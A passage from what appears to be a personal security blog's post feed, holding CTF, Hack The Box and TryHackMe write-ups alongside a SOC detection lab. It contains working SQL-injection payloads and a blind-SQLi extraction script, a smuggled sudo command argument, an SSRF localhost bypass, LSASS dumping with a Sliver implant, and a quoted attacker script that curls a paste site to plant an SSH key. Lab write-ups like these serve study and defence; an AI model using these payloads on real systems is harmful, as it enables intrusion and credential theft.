\u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=test\u0026amp;password=test\u0026amp;name=test\u0026amp;email=test@test.com\u0026amp;auth_level=admin\u0026#34; Uploads a reverse shell by creating a command and checking it\nuser.txt 5428c0b228e51f2428525f3faa3fcca2\nTo escalate privilldges we modify the setuid binary npcd\nroot.txt 9893d1d8c72bc11111a49fcb508ac07a\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_monitored/","title":"Htb_monitored"},{"content":"HTB surveillance Writeup for htb surveillnace box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:38 EAT Nmap scan report for 10.10.11.245 Host is up (0.30s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds A cms is running in port 80 , craft cms\nIt is vulnerable to rce CVE-2023-41892\nThere are 2 :\nmatthew zoneminder Further enumartion we get a backup file surveillance\u0026ndash;2023-10-17-202801\u0026ndash;v4.4.14.sql.zip. It has a sql backup of the database , here we get creds for the user matthew.\nuser.txt 260ecc03cedb8e78d80a6658b5b22eac\nWe also get the creda for zoneminder in the ZoneMinder config files password : ZoneMinderPassword2023\nZoneminder is a service running on port 8080, So we tunnel using ssh to access it.\nIt is vulnerable to rce CVE-2023-26035\nTo escalate priviledges and read root flag\n1 sudo /usr/bin/zmupdate.pl -v 1.19.0 -u \u0026#34;;cat /root/root.txt;\u0026#34; root.txt 13630834b0c9c6f122557097788d8e25\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_surveillance/","title":"Htb_surveillance"},{"content":"SOC Lab Setup Introduction This is my documentation of a lab setup for a SOC (Security operation center) environment. I decided to pursue this project with the aim of learning about endpoint detection and response. SOC analysis is more about blue teaming and detecting threats in an environment.\nAs is did this i followed steps from this blog post \u0026raquo; here . Credits!!\nSummary Setup Intrusion Blocking attacks Tuning False Positives Setup Setup of vms(ubuntu server and windows) NOTE: im using a computer with the following specs:\n8gb RAM intel i5 500gb hard disk You might want to allocate different amount of resources for your vms depending on the specs of your hardware. As for me my specs constrained me , my vms were slow esp the windows vm. I allocated 2gb for the windows vm and 1gb for the ubuntu server.\nInstalling of limacharlie sensor LimaCharlie is a very powerful “SecOps Cloud Platform” . Check it out \u0026raquo; here\nC2 (command and control) For the C2 i used sliver-server by bishop fox\n1 Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing I created a C2 payload and dropped it in the windows vm.\nUsing the implant we can access the windows vm from the ubuntu server attack machine.\nBelow is a list of running processes\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 . ├── [0] [System Process] │ └── [4] System │ ├── [1444] Memory Compression │ ├── [72] Registry │ └── [528] smss.exe ├── [632] csrss.exe ├── [732] csrss.exe ├── [776] wininit.exe │ ├── [864] services.exe │ │ ├── [2160] Sysmon64.exe │ │ ├── [3708] svchost.exe │ │ ├── [1348] svchost.exe │ │ ├── [1508] svchost.exe │ │ ├── [1668] svchost.exe │ │ │ └── [5768] audiodg.exe │ │ ├── [2152] vm3dservice.exe │ │ │ └── [2284] vm3dservice.exe │ │ ├── [1128] svchost.exe │ │ │ ├── [648] taskhostw.exe │ │ │ ├── [1960] sihost.exe │ │ │ ├── [2436] CompatTelRunner.exe │ │ │ │ ├── [2488] conhost.exe │ │ │ │ └── [1236] CompatTelRunner.exe │ │ │ ├── [2520] MicrosoftEdgeUpdate.exe │ │ │ └── [3460] taskhostw.exe │ │ ├── [2124] vmtoolsd.exe │ │ ├── [4368] svchost.exe │ │ ├── [3500] SecurityHealthService.exe │ │ ├── [6548] svchost.exe │ │ ├── [1636] svchost.exe │ │ ├── [1772] svchost.exe │ │ ├── [1788] svchost.exe │ │ ├── [3100] SgrmBroker.exe │ │ ├── [1304] svchost.exe │ │ ├── [2168] VGAuthService.exe │ │ ├── [2132] rphcp.exe │ │ ├── [628] svchost.exe │ │ ├── [896] spoolsv.exe │ │ ├── [992] svchost.exe │ │ │ ├── [1284] ShellExperienceHost.exe │ │ │ ├── [1580] RuntimeBroker.exe │ │ │ ├── [3240] BackgroundTransferHost.exe │ │ │ ├── [4376] backgroundTaskHost.exe │ │ │ ├── [5572] RuntimeBroker.exe │ │ │ ├── [740] unsecapp.exe │ │ │ ├── [1156] dllhost.exe │ │ │ ├── [5608] SearchApp.exe │ │ │ ├── [6004] RuntimeBroker.exe │ │ │ ├── [4352] RuntimeBroker.exe │ │ │ ├── [2476] WmiPrvSE.exe │ │ │ ├── [3680] WmiPrvSE.exe │ │ │ ├── [3892] TextInputHost.exe │ │ │ ├── [3932] StartMenuExperienceHost.exe │ │ │ ├── [4488] MoUsoCoreWorker.exe │ │ │ ├── [1256] RuntimeBroker.exe │ │ │ ├── [3552] smartscreen.exe │ │ │ ├── [5064] SearchApp.exe │ │ │ └── [1216] TiWorker.exe │ │ ├── [2984] dllhost.exe │ │ ├── [2092] TrustedInstaller.exe │ │ ├── [2376] svchost.exe │ │ ├── [3912] SearchIndexer.exe │ │ ├── [5652] svchost.exe │ │ ├── [1172] svchost.exe │ │ │ ├── [3152] ctfmon.exe │ │ │ └── [4800] CompatTelRunner.exe │ │ │ └── [2944] conhost.exe │ │ ├── [1520] svchost.exe │ │ ├── [1532] svchost.exe │ │ ├── [1832] msdtc.exe │ │ ├── [736] svchost.exe │ │ ├── [4852] sppsvc.exe │ │ ├── [5172] svchost.exe │ │ ├── [1292] svchost.exe │ │ ├── [1628] svchost.exe │ │ ├── [1640] svchost.exe │ │ └── [2120] svchost.exe │ ├── [876] lsass.exe │ └── [1016] fontdrvhost.exe ├── [784] winlogon.exe │ ├── [1008] fontdrvhost.exe │ └── [1040] dwm.exe ├── [3328] explorer.exe │ ├── [3512] SecurityHealthSystray.exe │ ├── [3880] vmtoolsd.exe │ ├── [4272] OneDrive.exe │ └── [6984] cmd.exe │ ├── [1696] CONTINUED_CARRY.exe │ └── [3612] conhost.exe ├── [6808] setup.exe │ ├── [7032] setup.exe │ └── [3008] MicrosoftEdgeUpdate.exe └── [6952] Microsoft.SharePoint.exe ⚠️ Security Product(s): Sysmon64, Windows Smart Screen Inturn we can observe the malware in the limacharlie telementery. We can detect our maliciuos process apart from the the legitimate processes. we can also view it network connections.\nIntrusion I can steal creds by dumping lsass.exe from the windows box memory to my attack machine\nThis will generate telementery in limacharkie that we can search with \u0026ldquo;SENSITIVE_PROCESS_ACCESS\u0026rdquo;\nWe can create an edr rule to alert once this type of activity occurs\n1 2 3 4 event: SENSITIVE_PROCESS_ACCESS op: ends with path: event/*/TARGET/FILE_PATH value: lsass.exe This rule will detect \u0026ldquo;SENSITIVE_PROCEE_ACCESS\u0026rdquo; with process being \u0026ldquo;lsass.exe\u0026rdquo;\nTo respond we use:\n1 2 - action: report name: LSASS access This will generate a detection report that we can view in the detections menu.\nBlocking attacks Here we are going to craft rules to take action when detections are made\nin thbis i ran thsi command :\n1 vssadmin delete shadows /all Which will delete volume shadow copies. This is just an example of a process that may indicate suspicious activity on a system\nThen we craft an Response rule:\nThis rule will terminate the parent process when it is detected.\n1 2 3 4 5 6 - action: report name: vss_deletion_kill_it - action: task command: - deny_tree - \u0026lt;\u0026lt;routing/parent\u0026gt;\u0026gt; This hung shell is an indication that it worked succesfully\nTuning False Positives Here we craft a false positive detection rule. This is whereby we can prevent alerts when normal system processes are run, thus causing alot of noise.\nI crafted to detect when whoami.exe is run. This is just an example.\n1 2 3 4 5 6 7 8 9 10 11 op: and rules: - op : is path: cat value: Whoami Utility Execution - op: is path: detect/event/FILE_PATH value: C:\\Windows\\system32\\whoami.exe - op: is path: detect/event/COMMAND_LINE value: \u0026#39;\u0026#34;C:\\Windows\\system32\\whoami.exe\u0026#34;\u0026#39; After testing it:\nIt works!!\nIf i run whoami when the rule is enabled i get no alaert, however whn i disable it i get an alert.\nAutomated Yara Scanning 1 2 YARA is a tool primarily used for identifying and classifying malware based on textual or binary patterns. It allows researchers and security professionals to craft rules that describe unique characteristics of specific malware families or malicious behaviors. There are well crafted rules for sliver (our c2 server) on the internet. We will use this \u0026raquo; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ule sliver_github_file_paths_function_names { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver Windows and Linux implants based on paths and function names within the binary\u0026#34; strings: $p1 = \u0026#34;/sliver/\u0026#34; $p2 = \u0026#34;sliverpb.\u0026#34; $fn1 = \u0026#34;RevToSelfReq\u0026#34; $fn2 = \u0026#34;ScreenshotReq\u0026#34; $fn3 = \u0026#34;IfconfigReq\u0026#34; $fn4 = \u0026#34;SideloadReq\u0026#34; $fn5 = \u0026#34;InvokeMigrateReq\u0026#34; $fn6 = \u0026#34;KillSessionReq\u0026#34; $fn7 = \u0026#34;ImpersonateReq\u0026#34; $fn8 = \u0026#34;NamedPipesReq\u0026#34; condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and (all of ($p*) or 3 of ($fn*)) } rule sliver_proxy_isNotFound_retn_cmp_uniq { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on some unique CMPs within the Proxy isNotFound function. False positives may occur\u0026#34; strings: $ = {C644241800C381F9B3B5E9B2} $ = {8B481081F90CAED682} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } rule sliver_nextCCServer_calcs { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on instructions from the nextCCServer function. False positives may occur\u0026#34; strings: $ = {4889D3489948F7F94839CA????48C1E204488B0413488B4C1308} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } We will also need a rule to detect when yara is matched.\n1 2 3 4 5 6 7 8 event: YARA_DETECTION op: and rules: - not: true op: exists path: event/PROCESS/* - op: exists path: event/RULE_NAME From here we can create rules to automatically scan new executables and those in the downloads directory.\nWith this we can uleash the full power of the EDR to scan and detect malicious processes and files\nUntil next time!! HACK THE PLANET\n","date":"2024-02-06T15:57:25+03:00","image":"https://f0rk3b0mb.github.io/cover/soc_lab.jpg","permalink":"https://f0rk3b0mb.github.io/p/soc_analyst_lab/","title":"Soc_analyst_lab"},{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 payload: \u0026#34; or 1=1-- - since it was in json we you had to excape the first double-quote\nREADME This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\nGain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 payload : root@knightctf.com\u0026#39;-- - Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d The hash is md5 since it has a length of 32. Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 payload : anything\u0026#39; or 1=1-- - We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\nUpdate:\nAfter you get the password , there is ana OTP page . The page also has an option to resend otp which requires you to enter an email. If we eneter the email roor@knightctf.com. That we had earlier we can see that it accepts it. Note: I had tries this methos earlier but i used the wrong format.\nSo you can send several email as an array []\n1 2 3 4 { \u0026#34;email\u0026#34;: [\u0026#34;root@knightctf.com\u0026#34;,\u0026#34;attacker@email.com\u0026#34;] } This will send the OTP code to both emails. Using the OTP code we get the flag\nCREDIT: @T3l3sc0p3\nNetworking For the networking challs check out my teammates writeups on them \u0026raquo;\nhere ","date":"2024-01-20T22:14:59+03:00","image":"https://f0rk3b0mb.github.io/cover/knightctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34; or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main() flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Writeup of htb sherlock Meerkat rating: easy\nWe believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running? we can filter the meerkat-alerts.json with\u0026hellip;\n1 2 3 4 cat meerkat-alerts.json |jq |grep signature | grep -v python the bmp name is in the signature ans: Bonitasoft\nWe believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out? From the meerkat-alerts.json and from pacap file we can see that there was alot of alerts on python-requests and we can see the requests tested different creds. This is possible Credential Stuffing\nans: Credential Stuffing\nDoes the vulnerability exploited have a CVE assigned - and if so, which one? Here use the same command as question1 , the cve is in the signature\nans: CVE-2022-25237\nWhich string was appended to the API URL path to bypass the authorization filter by the attacker\u0026rsquo;s exploit? in this case i used tshark to analyse the pcap.\n1 2 3 4 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri | grep -i api filter post requests , get the url path and grep for the api endpoints i18ntranslation\nHow many combinations of usernames and passwords were used in the credential stuffing attack? here we filter post requests, the we remove \u0026ldquo;username=install\u0026amp;password=install\u0026amp;_l=en\u0026rdquo; , i also removed \u0026ldquo;/bonita/API/portal/page/;i18ntranslation\u0026rdquo; and \u0026ldquo;/bonita/API/pageUpload;i18ntranslation?action=add\u0026rdquo; which were not login requests then pipe the output to uniq\n1 2 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri -e http.file_data | grep -v \u0026#34;username=install\u0026amp;password=install\u0026amp;_l=en\u0026#34; | grep -v \u0026#34;/bonita/API/portal/page/;i18ntranslation\u0026#34; | grep -v \u0026#34;/bonita/API/pageUpload;i18ntranslation?action=add\u0026#34; | uniq | wc -l ans: 56\nWhich username and password combination was successful? From the query above without uniq , the last combination has a different http.file_data , yoll have to check through wireshark but the ans is \u0026hellip;\nans: seb.broom@forela.co.uk:g0vernm3nt\nIf any, which text sharing site did the attacker utilise? As i was analysing the pcap using this query we can get the full uri. the url is part of parameters\n1 tshark -r meerkat.pcap -T fields -e http.request.full_uri | uniq ans: pastes.io\nPlease provide the filename of the public key used by the attacker to gain persistence on our host. Visiting the url we get a bash script with the following content\u0026hellip; hxxps[://]pastes[.]io/raw/bx5gcr0et8\n1 2 3 #!/bin/bash curl https://pastes.io/raw/hffgra4unv \u0026gt;\u0026gt; /home/ubuntu/.ssh/authorized_keys sudo service ssh restart ans: hffgra4unv\nCan you confirmed the file modified by the attacker to gain persistence? see above\nans: /home/ubuntu/.ssh/authorized_keys\nCan you confirm the MITRE technique ID of this type of persistence mechanism? this technique of using ssh authorized keys has id T1098.004. You can get this by visiting mitre website or googling or use chatgpt idc.\nans: T1098.004\n","date":"2023-12-20T14:43:14+03:00","permalink":"https://f0rk3b0mb.github.io/p/htb-sherlock-meerkat/","title":"Htb Sherlock Meerkat"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\nHow many events were collected and Ingested in the index main? 1 2 3 index=\u0026#34;main\u0026#34; ans: 12256 On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username? 1 2 3 index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key? 1 2 3 4 index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto Examine the logs and identify the user that the adversary was trying to impersonate. 1 2 3 4 5 6 7 The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto What is the command used to add a backdoor user from a remote computer? 1 2 3 4 index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34; How many times was the login attempt from the backdoor user observed during the investigation? 1 2 3 4 5 6 index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0 What is the name of the infected host on which suspicious Powershell commands were executed? 1 2 3 index=main powershell ans : James.browne PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution? 1 2 3 index=main EventID=\u0026#34;4103\u0026#34; ans: 79 An encoded Powershell script from the infected host initiated a web request. What is the full URL? 1 2 3 4 5 6 from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager Wazuh agents 1 2 3 4 5 6 7 8 9 1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? disconnected Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4 1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196 Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9 1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer Collecting Linux Logs with Wazuh 1 2 3 4 1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5 Generating Reports with Wazuh 1 2 3 4 1. Analyse the report. What is the name of the agent that has generated the most alerts? agent-001 ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400 I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True We can easily bypass this , there are many routed to localhost other that the ones listed there. You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 http://127.0.1.3:1337/api/addAdmin?username=test We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree} Security Misconfiguration 1 2 3 4 5 6 7 8 Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17} XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? denial of service Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag} Insecure Deserialization - Code Execution 1 2 3 4 5 6 flag.txt 4a69a7ff9fd68 Components with know vulns 1 2 3 4 5 6 7 How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611 Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 //registration if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp } With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1 So i sent the request for registration with the password as two smileys and login with the same password. In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login The ctf was great and see you in the 